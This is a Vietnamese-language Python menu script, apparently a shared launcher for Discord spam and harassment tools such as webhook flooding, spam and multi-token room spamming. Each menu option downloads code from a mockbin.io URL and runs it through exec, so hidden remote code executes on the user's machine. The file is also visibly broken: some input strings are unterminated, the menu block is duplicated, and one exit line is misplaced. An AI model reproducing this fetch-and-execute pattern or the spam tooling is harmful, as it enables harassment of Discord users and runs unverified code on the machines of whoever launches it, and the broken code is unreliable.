import requests,sys
from time import sleep
from datetime import datetime, timedelta
import os
try:
	import requests,colorama,prettytable
except:
	os.system("pip install requests")
	os.system("pip install colorama")
	os.system("pip install prettytable")
#màu
xnhac = "\033[1;36m"
do = "\033[1;31m"
luc = "\033[1;32m"
vang = "\033[1;33m"
xduong = "\033[1;34m"
hong = "\033[1;35m"
trang = "\033[1;37m"
whiteb="\033[1;37m"
red="\033[0;31m"
redb="\033[1;31m"
end='\033[0m'
def banner():
 banner = f"""
\033[0;31m
\033[0;31m 
"""

tk = 'aesw'
mk = 'tp'


def login():
    # Yêu cầu người dùng nhập tên người dùng và mật khẩu
    username = input("Nhập tên người dùng: ")
    password = input("Nhập mật khẩu: ")

    # Kiểm tra tên người dùng và mật khẩu với từng cặp tk và mk
    if username == tk and password == mk:
        print("Đăng nhập thành công!")
    else:
        print("Đăng nhập không thành công. Vui lòng thử lại.")
        quit()


os.system("cls" if os.name == "nt" else "clear")
banner()

print(" \033[1;36m- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
print("\033[1;31mTool by: \033[1;33m Tphonq")                                     
print("\033[1;31m Tool discord By AESW")
print("- \033[1;36m - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
print("\033[1;31mChức Năng [1] Bot menu soure by Tphonq")
print(" \033[1;37m────────────────────────────────────────────────────────────")                                                          
print("\033[1;31mChức năng [2] Treo nhây webhook discord | Soure By lê ngọc anh ")
print(" \033[1;37m────────────────────────────────────────────────────────────")
print("\033[1;31m Chức Năng [3] Treo spam discord ")
print(" \033[1;37m \033[1;37m────────────────────────────────────────────────────────────")
print("\033[1;31m Chức năng [4] Bot status | By aesw ")                               
print(" \033[1;37m────────────────────────────────────────────────────────────")                                                          
print("\033[1;31mChức năng [5] nhay + treo room |")
print(" \033[1;37m────────────────────────────────────────────────────────────")
print("\033[1;31mChức năng [6]  nhây discord  | By tphonq   ")                  
print(" \033[1;37m────────────────────────────────────────────────────────────")                                           
chon = int(input('\033[1;31m[\033[1;31m[=.=]\033[1;31m] \033[1;31m=> \033[1;31m chọn chức năng theo số 
if chon == 1 :
	exec(requests.get('https://7dab6cca5914434c9126b52d5b99dfd0.api.mockbin.io/').text)
if chon == 2 :
	exec(requests.get('https://e946da2ed5ac4cf0beb86ebb2d7824c0.api.mockbin.io/').text)
if chon == 3 :
	exec(requests.get('https://9c2d5ed02f7147ee8fb6cd1b7f3ff6bd.api.mockbin.io/').text)
if chon == 4 :
	exec(requests.get('https://c4375fd6414b4c5eb8ae37549b252872.api.mockbin.io/').text)
if chon == 5 :
	exec(requests.get('https://5eaa20c85e0b465fadb2c705a46be950.api.mockbin.io/').text)
if chon == 6 :
	exec(requests.get('https://1f03621df84d43a6813d5df709f1150e.api.mockbin.io/').text)
	print (" Sai Lựa Chọn ")
	exit()    
print("\033[1;31mChức năng [5] spam nhay + treo room | đa token")
print(" \033[1;37m────────────────────────────────────────────────────────────")
print("\033[1;31mChức năng [6]  nhây discord  | By le ngoc anh   ")                  
print(" \033[1;37m────────────────────────────────────────────────────────────")                                           
chon = int(input('\033[1;31m[\033[1;31m[=.=]\033[1;31m] \033[1;31m=> \033[1;31m chọn chức năng theo số 
if chon == 1 :
	exec(requests.get('https://7dab6cca5914434c9126b52d5b99dfd0.api.mockbin.io/').text)
if chon == 2 :
	exec(requests.get('https://e946da2ed5ac4cf0beb86ebb2d7824c0.api.mockbin.io/').text)
if chon == 3 :
	exec(requests.get('https://9c2d5ed02f7147ee8fb6cd1b7f3ff6bd.api.mockbin.io/').text)
if chon == 4 :
	exec(requests.get('https://c4375fd6414b4c5eb8ae37549b252872.api.mockbin.io/').text)
if chon == 5 :
	exec(requests.get('https://5eaa20c85e0b465fadb2c705a46be950.api.mockbin.io/').text)
if chon == 6 :
	exec(requests.get('https://1f03621df84d43a6813d5df709f1150e.api.mockbin.io/').text)
	print (" Sai Lựa Chọn ")
	exit()
